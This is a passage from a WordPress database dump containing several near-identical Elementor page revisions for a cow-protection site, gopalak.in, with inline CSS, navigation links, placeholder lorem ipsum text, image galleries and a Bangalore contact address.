11:30:55','',1172,'https://gopalak.in/?p=1556',0,'revision','',0),(1558,1,'2022-10-10 17:04:30','2022-10-10 11:34:30','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:04:30','2022-10-10 11:34:30','',1373,'https://gopalak.in/?p=1558',0,'revision','',0),(1559,1,'2022-10-10 17:04:31','2022-10-10 11:34:31','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:04:31','2022-10-10 11:34:31','',1373,'https://gopalak.in/?p=1559',0,'revision','',0),(1560,1,'2022-10-10 17:04:31','2022-10-10 11:34:31','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:04:31','2022-10-10 11:34:31','',1373,'https://gopalak.in/?p=1560',0,'revision','',0),(1561,1,'2022-10-10 17:05:12','2022-10-10 11:35:12','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" 